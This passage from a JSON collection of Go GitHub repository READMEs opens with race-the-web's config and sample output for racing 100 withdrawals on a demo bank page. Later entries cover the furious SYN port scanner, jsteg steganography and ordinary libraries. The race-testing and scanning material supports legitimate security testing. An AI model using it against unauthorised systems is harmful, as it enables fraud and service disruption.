    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:29 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9998

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:30 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9997

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:36 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 98\n }\n]\n```\n\n## Binaries\n\nThe program has been written in Go, and as such can be compiled to all the common platforms in use today. The following architectures have been compiled, and can be found in the [releases](https://github.com/insp3ctre/race-the-web/releases) tab:\n\n- Windows amd64\n- Windows 386\n- Linux amd64\n- Linux 386\n- OSX amd64\n- OSX 386\n\n## Compiling\n\nFirst, make sure you have Go installed on your system. If you don't you can follow the install instructions for your operating system of choice here: https://golang.org/doc/install.\n\nBuild a binary for your current CPU architecture\n\n```sh\n$ make build\n```\n\nBuild for all major CPU architectures (see [Makefile](https://github.com/insp3ctre/race-the-web/blob/master/Makefile) for details) at once\n\n```sh\n$ make\n```\n\n### Dep\n\nThis project uses [Dep](https://github.com/golang/dep) for dependency management. All of the required files are kept in the `vendor` directory, however if you are getting errors related to dependencies, simply download Dep\n\n```sh\n$ go get -u github.com/golang/dep/cmd/dep\n```\n\nand run the following command from the RTW directory in order to download all dependencies\n\n```sh\n$ dep ensure\n```\n\n### Go 1.7 and newer are supported\n\nBefore 1.7, the `encoding/json` package's `Encoder` did not have a method to escape the `&`, `<`, and `>` characters; this is required in order to have a clean output of full HTML pages when running these race tests. _If this is an issue for your test cases, please submit a [new issue](https://github.com/insp3ctre/race-the-web/issues) indicating as such, and I will add a workaround (just note that any output from a server with those characters will come back with unicode escapes instead)._ Here are the relevant release details from Go 1.7: https://golang.org/doc/go1.7#encoding_json.\n\n## The Vulnerability\n\n> A race condition is a flaw that produces an unexpected result when the timing of actions impact other actions. An example may be seen on a multithreaded application where actions are being performed on the same data. Race conditions, by their very nature, are difficult to test for.\n> - [OWASP](https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010))\n\nRace conditions are a well known issue in software development, especially when you deal with fast, multi-threaded languages.\n\nHowever, as network speeds get faster and faster, web applications are becoming increasingly vulnerable to race conditions. Often because of legacy code that was not created to handle hundreds or thousands of simultaneous requests for the same function or resource.\n\nThe problem can often only be discovered when a fast, multi-threaded language is being used to generate these requests, using a fast network connection; at which point it becomes a network and logic race between the client application and the server application.\n\nThat is where **Race The Web** comes in. This program aims to discover race conditions in web applications by sending a large amount of requests to a specific endpoint at the same time. By doing so, it may invoke unintended behaviour on the server, such as the duplication of user information, coupon codes, bitcoins, etc.\n\n**Warning:** Denial of service may be an unintended side-effect of using this application, so please be careful when using it, and always perform this kind of testing with the explicit permission of the server owner and web application owner.\n\nCredit goes to [Josip Franjkovi\u0107](https://twitter.com/josipfranjkovic) for his [excellent article on the subject](https://www.josipfranjkovic.com/blog/race-conditions-on-web), which introduced me to this problem.\n\n## Why Go\n\nThe [Go programming language](https://golang.org/) is perfectly suited for the task, mainly because it is *so damned fast*. Here are a few reasons why:\n\n- Concurrency: Concurrency primitives are built into the language itself, and extremely easy to add to any Go program. Threading is [handled by the Go runtime scheduler](https://morsmachine.dk/go-scheduler), and not by the underlying operating system, which allows for some serious performance optimizations when it comes to concurrency.\n- Compiled: *Cross-compiles* to [most modern operating systems](https://golang.org/doc/install/source#environment); not slowed down by an interpreter or virtual machine middle-layer ([here are some benchmarks vs Java](https://benchmarksgame.alioth.debian.org/u64q/go.html)). (Oh, and did I mention that the binaries are statically compiled?)\n- Lightweight: Only [25 keywords](https://golang.org/ref/spec#Keywords) in the language, and yet still almost everything can be done using the standard library.\n\nFor more of the nitty-gritty details on why Go is so fast, see [Dave Cheney](https://twitter.com/davecheney)'s [excellent talk on the subject](http://dave.cheney.net/2014/06/07/five-things-that-make-go-fast), from 2014.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serialx/hashring", "link": "https://github.com/serialx/hashring", "tags": [], "stars": 524, "description": "Consistent hashing \"hashring\" implementation in golang (using the same algorithm as libketama)", "lang": "Go", "repo_lang": "", "readme": "hashring\n============================\n\nImplements consistent hashing that can be used when\nthe number of server nodes can increase or decrease (like in memcached).\nThe hashing ring is built using the same algorithm as libketama.\n\nThis is a port of Python hash_ring library \nin Go with the extra methods to add and remove nodes.\n\n\nUsing\n============================\n\nImporting ::\n\n```go\nimport \"github.com/serialx/hashring\"\n```\n\nBasic example usage ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nTo fulfill replication requirements, you can also get a list of servers that should store your key.\n```go\nserversInRing := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.248:11212\",\n \"192.168.0.249:11212\",\n \"192.168.0.250:11212\",\n \"192.168.0.251:11212\",\n \"192.168.0.252:11212\"}\n\nreplicaCount := 3\nring := hashring.New(serversInRing)\nserver, _ := ring.GetNodes(\"my_key\", replicaCount)\n```\n\nUsing weights example ::\n\n```go\nweights := make(map[string]int)\nweights[\"192.168.0.246:11212\"] = 1\nweights[\"192.168.0.247:11212\"] = 2\nweights[\"192.168.0.249:11212\"] = 1\n\nring := hashring.NewWithWeights(weights)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nAdding and removing nodes example ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nring = ring.RemoveNode(\"192.168.0.246:11212\")\nring = ring.AddNode(\"192.168.0.250:11212\")\nserver, _ := ring.GetNode(\"my_key\")\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamg/furious", "link": "https://github.com/liamg/furious", "tags": ["port-scanner", "ip-scanner", "network-scanner", "security"], "stars": 524, "description": ":angry: Go IP/port scanner with SYN (stealth) scanning and device manufacturer identification", "lang": "Go", "repo_lang": "", "readme": "# Furious IP/Port Scanner\n\nFurious is a fast, lightweight, portable network scanner.\n\n![Screenshot 1](./screenshot.png)\n![Screenshot 2](./screenshot2.png)\n\nI haven't done any proper performance testing, but a SYN scan of a single host, including all known ports (~6000) will typically take in the region of 4 seconds. On the same machine, nmap took 98 seconds and produced exactly the same results.\n\n## Install\n\nYou'll need to install libpcap.\n\n- On Linux, install `libpcap` with your package manager\n- On OSX, `brew install libpcap`\n- On Windows, install [WinPcap](https://www.winpcap.org/)\n\nThen just:\n\n```\ngo get -u github.com/liamg/furious\n```\n\n## Options\n\n### `-s [TYPE]` `--scan-type [TYPE]`\n\nUse the specified scan type. The options are:\n\n| Type | Description |\n|------------|-------------|\n| `syn` | A SYN/stealth scan. Most efficient scan type, using only a partial TCP handshake. Requires root privileges.\n| `connect` | A less detailed scan using full TCP handshakes, though does not require root privileges. \n| `device` | Attempt to identify device MAC address and manufacturer where possible. Useful for listing devices on a LAN.\n\nThe default is a SYN scan.\n\n### `-p [PORTS]` `--ports [PORTS]`\n\nScan the specified ports. Defaults to a list of all known ports as [provided by IANA](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml).\n\nPorts may be specified using a comma delimited list, and ranges are also allowed.\n\nFor example:\n\n```\n--ports 22,80,443,8080-8082\n```\n\n...will scan 22, 80, 443, 8080, 8081, and 8082.\n\n### `-t [MS]` `--timout-ms [MS]`\n\nThe network timeout to apply to each port being checked. Default is *1000ms*.\n\n### `-w [COUNT]` `--workers [COUNT]`\n\nThe number of worker routines to use to scan ports in parallel. Default is *1000* workers.\n\n### `-u` `--up-only`\n\nOnly show output for hosts that are confirmed as up.\n\n### `--version`\n\nOutput version information and exit.\n\n## Usage\n\nFurious can be used to:\n\n### Find open ports on one or more hosts\n\nScan a single host:\n```\nfurious 192.168.1.4 \n```\n\nScan a whole CIDR:\n```\nfurious 192.168.1.0/24 \n```\n\n### Scan a mixture of IPs, hostnames and CIDRs\n\n```\nfurious -s connect 8.8.8.8 192.168.1.1/24 google.com\n```\n\n### Run a SYN (stealth) scan (with root privileges)\n\n```\nsudo -E furious -s syn 192.168.1.1\n```\n\n### Run a connect scan as any user\n\n```\nfurious -s connect 192.168.1.1\n```\n\n### Identify device MAC address and manufacturer within a local network\n\n```\nfurious -s device 192.168.1.1/24 -u\n```\n\n## Troubleshooting\n\n### `sudo: furious: command not found`\n\nIf you installed using go, your user has the environment variables required to locate go programs, but root does not. You need to:\n\n```\nsudo env \"PATH=$PATH\" furious\n```\n\n## SYN/Connect scans are slower than nmap!\n\nThey're not in my experience, but with default arguments furious scans nearly six times as many ports as nmap does by default.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jonmorehouse/terraform-provisioner-ansible", "link": "https://github.com/jonmorehouse/terraform-provisioner-ansible", "tags": [], "stars": 524, "description": "A provisioner for bootstrapping terraform resources with ansible", "lang": "Go", "repo_lang": "", "readme": "# terraform-provisioner-ansible\n> Provision terraform resources with ansible\n\n## Overview\n\n**[Terraform](https://github.com/hashicorp/terraform)** is a tool for automating infrastructure. Terraform includes the ability to provision resources at creation time through a plugin api. Currently, some builtin [provisioners](https://www.terraform.io/docs/provisioners/) such as **chef** and standard scripts are provided; this provisioner introduces the ability to provision an instance at creation time with **ansible**.\n\nThis provisioner provides the ability to apply **host-groups**, **plays** or **roles** against a host at provision time. Ansible is run on the host itself and this provisioner configures a dynamic inventory on the fly as resources are created.\n\n**terraform-provisioner-ansible** is shipped as a **Terraform** [module](https://www.terraform.io/docs/modules/create.html). To include it, simply download the binary and enable it as a terraform module in your **terraformrc**.\n\n## Installation\n\n**terraform-provisioner-ansible** ships as a single binary and is compatible with **terraform**'s plugin interface. Behind the scenes, terraform plugins use https://github.com/hashicorp/go-plugin and communicate with the parent terraform process via RPC.\n\nTo install, download and un-archive the binary and place it on your path.\n\n```bash\n$ https://github.com/jonmorehouse/terraform-provisioner-ansible/releases/download/0.0.1-terraform-provisioner-ansible.tar.gz\n\n$ tar -xvf 0.0.1-terraform-provisioner-ansible.tar.gz /usr/local/bin\n```\n\nOnce installed, a `~/.terraformrc` file is used to _enable_ the plugin.\n\n```bash\nproviders {\n ansible = \"/usr/local/bin/terraform-provisioner-ansible\"\n}\n```\n\n## Usage\n\nOnce installed, you can provision resources by including an `ansible` provisioner block.\n\nThe following example demonstrates a configuration block to apply a host group's plays to new instances. You can specify a list of hostgroups and a list of plays to specify which ansible tasks to perform on the host.\n\nAdditionally, `groups` and `extra_vars` are accessible to resolve variables and group the new host in ansible.\n\n```\n{\n resource \"aws_instance\" \"terraform-provisioner-ansible-example\" {\n ami = \"ami-408c7f28\"\n instance_type = \"t1.micro\"\n\n provisioner \"ansible\" {\n connection {\n user = \"ubuntu\"\n }\n\n playbook = \"ansible/playbook.yml\"\n groups = [\"all\"]\n hosts = [\"terraform\"]\n extra_vars = {\n \"env\": \"terraform\" \n }\n }\n }\n}\n```\n\nCheck out [example](example/) for a more detailed walkthrough of the provisioner and how to provision resources with **ansible**.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slicebit/qb", "link": "https://github.com/slicebit/qb", "tags": ["golang", "go", "database", "db", "orm", "sql", "sqlite3", "sqlalchemy", "postgresql", "mysql"], "stars": 523, "description": "The database toolkit for go", "lang": "Go", "repo_lang": "", "readme": "![alt text](https://github.com/slicebit/qb/raw/master/qb_logo_128.png \"qb: the database toolkit for go\")\n\n# qb - the database toolkit for go\n\n[![Build Status](https://travis-ci.org/slicebit/qb.svg?branch=master)](https://travis-ci.org/slicebit/qb)\n[![Coverage Status](https://coveralls.io/repos/github/slicebit/qb/badge.svg?branch=master)](https://coveralls.io/github/slicebit/qb?branch=master)\n[![License (LGPL version 2.1)](https://img.shields.io/badge/license-GNU%20LGPL%20version%202.1-brightgreen.svg?style=flat)](http://opensource.org/licenses/LGPL-2.1)\n[![Go Report Card](https://goreportcard.com/badge/github.com/slicebit/qb)](https://goreportcard.com/report/github.com/slicebit/qb)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](http://godoc.org/github.com/slicebit/qb)\n\n**This project is currently pre 1.**\n\nCurrently, it's not feature complete. It can have potential bugs. There are no tests covering concurrency race conditions. It can crash especially in concurrency.\nBefore 1.x releases, each major release could break backwards compatibility.\n\nAbout qb\n--------\nqb is a database toolkit for easier db queries in go. It is inspired from python's best orm, namely sqlalchemy. qb is an orm(sqlx) as well as a query builder. It is quite modular in case of using just expression api and query building stuff.\n\n[Documentation](https://qb.readme.io)\n-------------\nThe documentation is hosted in [readme.io](https://qb.readme.io) which has great support for markdown docs. Currently, the docs are about 80% - 90% complete. The doc files will be added to this repo soon. Moreover, you can check the godoc from [here](https://godoc.org/github.com/slicebit/qb). Contributions & Feedbacks in docs are welcome.\n\nFeatures\n--------\n- Support for postgres(9.5.+), mysql & sqlite3\n- Powerful expression API for building queries & table ddls\n- Struct to table ddl mapper where initial table migrations can happen\n- Transactional session api that auto map structs to queries\n- Foreign key definitions\n- Single & Composite column indices\n- Relationships (soon.. probably in 0.3 milestone)\n\nInstallation\n------------\n```sh\ngo get -u github.com/slicebit/qb\n```\nIf you want to install test dependencies then;\n```sh\ngo get -u -t github.com/slicebit/qb\n```\n\nQuick Start\n-----------\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/slicebit/qb\"\n\t_ \"github.com/mattn/go-sqlite3\"\n _ \"github.com/slicebit/qb/dialects/sqlite\"\n)\n\ntype User struct {\n\tID string `db:\"id\"`\n\tEmail string `db:\"email\"`\n\tFullName string `db:\"full_name\"`\n\tOscars int `db:\"oscars\"`\n}\n\nfunc main() {\n\n\tusers := qb.Table(\n\t\t\"users\",\n\t\tqb.Column(\"id\", qb.Varchar().Size(40)),\n\t\tqb.Column(\"email\", qb.Varchar()).NotNull().Unique(),\n\t\tqb.Column(\"full_name\", qb.Varchar()).NotNull(),\n\t\tqb.Column(\"oscars\", qb.Int()).NotNull().Default(0),\n\t\tqb.PrimaryKey(\"id\"),\n\t)\n\n\tdb, err := qb.New(\"sqlite3\", \"./qb_test.db\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdefer db.Close()\n\n\tmetadata := qb.MetaData()\n\n\t// add table to metadata\n\tmetadata.AddTable(users)\n\n\t// create all tables registered to metadata\n\tmetadata.CreateAll(db)\n\tdefer metadata.DropAll(db) // drops all tables\n\n\tins := qb.Insert(users).Values(map[string]interface{}{\n\t\t\"id\": \"b6f8bfe3-a830-441a-a097-1777e6bfae95\",\n\t\t\"email\": \"jack@nicholson.com\",\n\t\t\"full_name\": \"Jack Nicholson\",\n\t})\n\n\t_, err = db.Exec(ins)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// find user\n\tvar user User\n\n\tsel := qb.Select(users.C(\"id\"), users.C(\"email\"), users.C(\"full_name\")).\n\t\tFrom(users).\n\t\tWhere(users.C(\"id\").Eq(\"b6f8bfe3-a830-441a-a097-1777e6bfae95\"))\n\n\terr = db.Get(sel, &user)\n\tfmt.Printf(\"%+v\\n\", user)\n}\n```\n\nCredits\n-------\n- [Aras Can Ak\u0131n](https://github.com/aacanakin)\n- [Christophe de Vienne](https://github.com/cdevienne)\n- [Onur \u015eent\u00fcre](https://github.com/onursenture)\n- [Aaron O. Ellis](https://github.com/aodin)\n- [Shawn Smith](https://github.com/shawnps)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lukechampine/jsteg", "link": "https://github.com/lukechampine/jsteg", "tags": ["steganography", "jpeg"], "stars": 523, "description": "JPEG steganography", "lang": "Go", "repo_lang": "", "readme": "jsteg\n-----\n\n[![GoDoc](https://godoc.org/lukechampine.com/jsteg?status.svg)](https://godoc.org/lukechampine.com/jsteg)\n[![Go Report Card](http://goreportcard.com/badge/lukechampine.com/jsteg)](https://goreportcard.com/report/lukechampine.com/jsteg)\n\n```\ngo get lukechampine.com/jsteg\n```\n\n`jsteg` is a package for hiding data inside jpeg files, a technique known as\n[steganography](https://en.wikipedia.org/wiki/steganography). This is accomplished\nby copying each bit of the data into the least-significant bits of the image.\nThe amount of data that can be hidden depends on the filesize of the jpeg; it\ntakes about 10-14 bytes of jpeg to store each byte of the hidden data.\n\n## Example\n\n```go\n// open an existing jpeg\nf, _ := os.Open(filename)\nimg, _ := jpeg.Decode(f)\n\n// add hidden data to it\nout, _ := os.Create(outfilename)\ndata := []byte(\"my secret data\")\njsteg.Hide(out, img, data, nil)\n\n// read hidden data:\nhidden, _ := jsteg.Reveal(out)\n```\n\nNote that the data is not demarcated in any way; the caller is responsible for\ndetermining which bytes of `hidden` it cares about. The easiest way to do this\nis to prepend the data with its length.\n\nA `jsteg` command is included, providing a simple wrapper around the\nfunctions of this package. It can hide and reveal data in jpeg files and\nsupports input/output redirection. It automatically handles length prefixes\nand uses a magic header to identify jpegs that were produced by `jsteg`.\n\nA more narrowly-focused command named `slink` is also included. `slink` embeds\na public key in a jpeg, and makes it easy to sign data and verify signatures\nusing keypairs derived from password strings. See [cmd/slink](cmd/slink) for a\nfull description.\n\nBinaries for both commands can be found [here](https://github.com/lukechampine/jsteg/releases).\n\n---\n\nThis package reuses a significant amount of code from the image/jpeg package.\nThe BSD-style license that governs the use of that code can be found in the\n`go_LICENSE` file.\n", "readme_type": "markdown", "hn_comments": "More about the JSTEG algorithm:\nhttps://pdfs.semanticscholar.org/8893/ba76f2e358e80ef5bd93e4...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helm/chart-releaser", "link": "https://github.com/helm/chart-releaser", "tags": ["helm", "charts", "kubernetes", "repository", "hosting"], "stars": 523, "description": "Hosting Helm Charts via GitHub Pages and Releases", "lang": "Go", "repo_lang": "", "readme": "# Chart Releaser\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n![CI](https://github.com/helm/chart-releaser/workflows/CI/badge.svg?branch=main&event=push)\n\n**Helps Turn GitHub Repositories into Helm Chart Repositories**\n\n`cr` is a tool designed to help GitHub repos self-host their own chart repos by adding Helm chart artifacts to GitHub Releases named for the chart version and then creating an `index.yaml` file for those releases that can be hosted on GitHub Pages (or elsewhere!).\n\n## Installation\n\n### Binaries (recommended)\n\nDownload your preferred asset from the [releases page](https://github.com/helm/chart-releaser/releases) and install manually.\n\n### Homebrew\n\n```console\n$ brew tap helm/tap\n$ brew install chart-releaser\n```\n\n### Go get (for contributing)\n\n```console\n$ # clone repo to some directory outside GOPATH\n$ git clone https://github.com/helm/chart-releaser\n$ cd chart-releaser\n$ go mod download\n$ go install ./...\n```\n\n### Docker (for Continuous Integration)\n\nDocker images are pushed to the [helmpack/chart-releaser](https://quay.io/repository/helmpack/chart-releaser?tab=tags) Quay container registry. The Docker image is built on top of Alpine and its default entry-point is `cr`. See the [Dockerfile](./Dockerfile) for more details.\n\n## Usage\n\nCurrently, `cr` can create GitHub Releases from a set of charts packaged up into a directory and create an `index.yaml` file for the chart repository from GitHub Releases.\n\n```console\n$ cr --help\nCreate Helm chart repositories on GitHub Pages by uploading Chart packages\nand Chart metadata to GitHub Releases and creating a suitable index file\n\nUsage:\n cr [command]\n\nAvailable Commands:\n completion generate the autocompletion script for the specified shell\n help Help about any command\n index Update Helm repo index.yaml for the given GitHub repo\n package Package Helm charts\n upload Upload Helm chart packages to GitHub Releases\n version Print version information\n\nFlags:\n --config string Config file (default is $HOME/.cr.yaml)\n -h, --help help for cr\n\nUse \"cr [command] --help\" for more information about a command.\n```\n\n### Create GitHub Releases from Helm Chart Packages\n\nScans a path for Helm chart packages and creates releases in the specified GitHub repo uploading the packages.\n\n```console\n$ cr upload --help\nUpload Helm chart packages to GitHub Releases\n\nUsage:\n cr upload [flags]\n\nFlags:\n -c, --commit string Target commit for release\n --generate-release-notes Whether to automatically generate the name and body for this release. See https://docs.github.com/en/rest/releases/releases\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for upload\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --release-notes-file string Markdown file with chart release notes. If it is set to empty string, or the file is not found, the chart description will be used instead. The file is read from the chart package\n --skip-existing Skip upload if release exists\n -t, --token string GitHub Auth Token\n --make-release-latest bool Mark the created GitHub release as 'latest' (default \"true\")\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n### Create the Repository Index from GitHub Releases\n\nOnce uploaded you can create an `index.yaml` file that can be hosted on GitHub Pages (or elsewhere).\n\n```console\n$ cr index --help\nUpdate a Helm chart repository index.yaml file based on a the\ngiven GitHub repository's releases.\n\nUsage:\n cr index [flags]\n\nFlags:\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for index\n -i, --index-path string Path to index file (default \".cr-index/index.yaml\")\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --pages-branch string The GitHub pages branch (default \"gh-pages\")\n --pages-index-path string The GitHub pages index path (default \"index.yaml\")\n --pr Create a pull request for index.yaml against the GitHub Pages branch (must not be set if --push is set)\n --push Push index.yaml to the GitHub Pages branch (must not be set if --pr is set)\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --remote string The Git remote used when creating a local worktree for the GitHub Pages branch (default \"origin\")\n -t, --token string GitHub Auth Token (only needed for private repos)\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n## Configuration\n\n`cr` is a command-line application.\nAll command-line flags can also be set via environment variables or config file.\nEnvironment variables must be prefixed with `CR_`.\nUnderscores must be used instead of hyphens.\n\nCLI flags, environment variables, and a config file can be mixed.\nThe following order of precedence applies:\n\n1. CLI flags\n1. Environment variables\n1. Config file\n\n### Examples\n\nThe following example show various ways of configuring the same thing:\n\n#### CLI\n\n cr upload --owner myaccount --git-repo helm-charts --package-path .deploy --token 123456789\n\n#### Environment Variables\n\n export CR_OWNER=myaccount\n export CR_GIT_REPO=helm-charts\n export CR_PACKAGE_PATH=.deploy\n export CR_TOKEN=\"123456789\"\n export CR_GIT_BASE_URL=\"https://api.github.com/\"\n export CR_GIT_UPLOAD_URL=\"https://uploads.github.com/\"\n export CR_SKIP_EXISTING=true\n\n cr upload\n\n#### Config File\n\n`config.yaml`:\n\n```yaml\nowner: myaccount\ngit-repo: helm-charts\npackage-path: .deploy\ntoken: 123456789\ngit-base-url: https://api.github.com/\ngit-upload-url: https://uploads.github.com/\n```\n\n#### Config Usage\n\n cr upload --config config.yaml\n\n\n`cr` supports any format [Viper](https://github.com/spf13/viper) can read, i. e. JSON, TOML, YAML, HCL, and Java properties files.\n\nNotice that if no config file is specified, `cr.yaml` (or any of the supported formats) is loaded from the current directory, `$HOME/.cr`, or `/etc/cr`, in that order, if found.\n\n#### Notes for Github Enterprise Users\n\nFor Github Enterprise, `chart-releaser` users need to set `git-base-url` and `git-upload-url` correctly, but the correct values are not always obvious to endusers.\n\nBy default they are often along these lines:\n\n```\nhttps://ghe.example.com/api/v3/\nhttps://ghe.example.com/api/uploads/\n```\n\nIf you are trying to figure out what your `upload_url` is try to use a curl command like this:\n`curl -u username:token https://example.com/api/v3/repos/org/repo/releases`\nand then look for `upload_url`. You need the part of the URL that appears before `repos/` in the path.\n\n##### Known Bug\n\nCurrently, if you set the upload URL incorrectly, let's say to something like `https://example.com/uploads/`, then `cr upload` will appear 